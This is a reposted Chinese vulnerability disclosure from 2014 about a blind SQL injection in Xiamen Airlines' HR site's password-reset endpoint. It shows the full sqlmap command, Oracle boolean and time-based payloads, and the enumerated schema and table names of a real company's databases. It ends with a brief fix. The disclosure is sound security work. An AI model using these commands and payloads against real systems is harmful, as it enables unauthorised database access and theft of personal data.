记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

厦门航空某处SQL注入可泄露主站以及商城信息

2014-08-15 19:06

从以前开始就想对厦门航空进行安全测试。昨天有时间了,开始测试。从wooyun还有域名信息开始收集。通过http://wooyun.org/bugs/wooyun-2010-045840找到了厦航的第一个ip段,然后进行80与8080端口检测,发现了一个dmz的登陆以及几个深信服的管理页面跟CISCO的防火墙登陆页面,尝试了深信服的命令执行漏洞未果。将目光转到了web端。最终将目标放在了hr.xiamenair.com.cn,注册用户以后开始全局测试,找了一会儿看到了一个找回密码。对于sql注入我本以为是没有的,想找个逻辑漏洞,在点击找回密码以后,通过抓包看到了

http://hr.xiamenair.com.cn/ashx/Person/Password.ashx?action=PasswordReset&User_Login_Name=xxxxx&User_Name=xxxxxx

,一个ajax请求,不管了。在挖不到漏洞我就受不了了,果断试了下是否存在sql注入,通过sqlmap的测试,成功发现一个sql注入。我好开森啊。

漏洞证明:

__                 __                          

/\ \ /\ \ __

\ \ \/'\ ___ \_\ \/\_\ ___ __

\ \ , < / __`\ /'_` \/\ \ /' _ `\ /'_ `\

\ \ \\`\ /\ \L\ \\ \L\ \ \ \/\ \/\ \/\ \L\ \

\ \_\ \_\ \____/ \___,_\ \_\ \_\ \_\ \____ \

\/_/\/_/\/___/ \/__,_ /\/_/\/_/\/_/\/___L\ \

/\____/

The Cloud Development Environment \_/__/



Type help for our interactive help system



5up3rc@vm-0:~$ sudo sqlmap -u "http://hr.xiamenair.com.cn/ashx/Person/Password.ashx?action=PasswordReset&User_Login_Name=xxx%40xxxx.com&User_Name=xxxxx" --tables --time-sec=2

[sudo] password for 5up3rc:



sqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org



[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage cau

sed by this program



[*] starting at 09:13:31



[09:13:31] [INFO] resuming back-end DBMS 'oracle'

[09:13:31] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: User_Name

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: action=PasswordReset&User_Login_Name=5up3rc@jdsec.com&User_Name=%E8%94%A1%E5%8B%87' AND 8520=8520 AND 'jhpF'='jhpF



Type: AND/OR time-based blind

Title: Oracle AND time-based blind (heavy query)

Payload: action=PasswordReset&User_Login_Name=5up3rc@jdsec.com&User_Name=%E8%94%A1%E5%8B%87' AND 7689=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'nREw'='nREw

---

[09:13:33] [INFO] the back-end DBMS is Oracle

web server operating system: Windows 2008 R2 or 7

web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5

back-end DBMS: Oracle

[09:13:33] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes

[09:13:33] [INFO] fetching database (schema) names

[09:13:33] [INFO] fetching number of databases

[09:13:33] [INFO] resumed: 6

[09:13:33] [INFO] resumed: ETKT

[09:13:33] [INFO] resumed: HR_RECRUIT_ADM

[09:13:33] [INFO] resumed: SYS

[09:13:33] [INFO] resumed: SYSTEM

[09:13:33] [INFO] resumed: XHSHOPADM

[09:13:33] [INFO] resumed: XMAIR

[09:13:33] [INFO] fetching tables for databases: 'ETKT, HR_RECRUIT_ADM, SYS, SYSTEM, XHSHOPADM, XMAIR'

[09:13:33] [INFO] fetching number of tables for database 'HR_RECRUIT_ADM'

[09:13:33] [INFO] resumed: 30

[09:13:33] [INFO] resumed: JOBS_CODEDETAIL

[09:13:33] [INFO] resumed: JOBS_ELEME

[09:13:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[09:13:33] [INFO] retrieved: JOBS_FILES

[09:14:25] [INFO] retrieved: JOBS_FORUM_REPLY

[09:16:07] [INFO] retrieved: JOBS_FORUM_SECTION

[09:17:34] [INFO] retrieved: JOBS_FORUM_TOPIC

[09:18:38] [INFO] retrieved: JOBS_HTML

[09:19:26] [INFO] retrieved: JOBS_MESSAGE_INFO

[09:21:52] [INFO] retrieved: JOBS_MESSAGE_M

[09:22:26] [INFO] retrieved:

[09:22:36] [INFO] retrieved:



QQ截图20140803180733.png



一个Oracle的眼是盲注。通过前面的库,可以看到涉及到的不只是hr的数据库,还有shop跟xmair,我猜可能有主站信息,一个注入跑了一下午,我的邮箱快崩溃了。。。为了防止我的信息泄露,上面的信息我打码了。本人语文不好,所以写这个大多数也不是很通顺,能看懂就好了。

修复方案:

过滤User_Name参数


知识来源: www.wooyun.org/bugs/wooyun-2014-070871

阅读:135319 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“厦门航空某处SQL注入可泄露主站以及商城信息”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云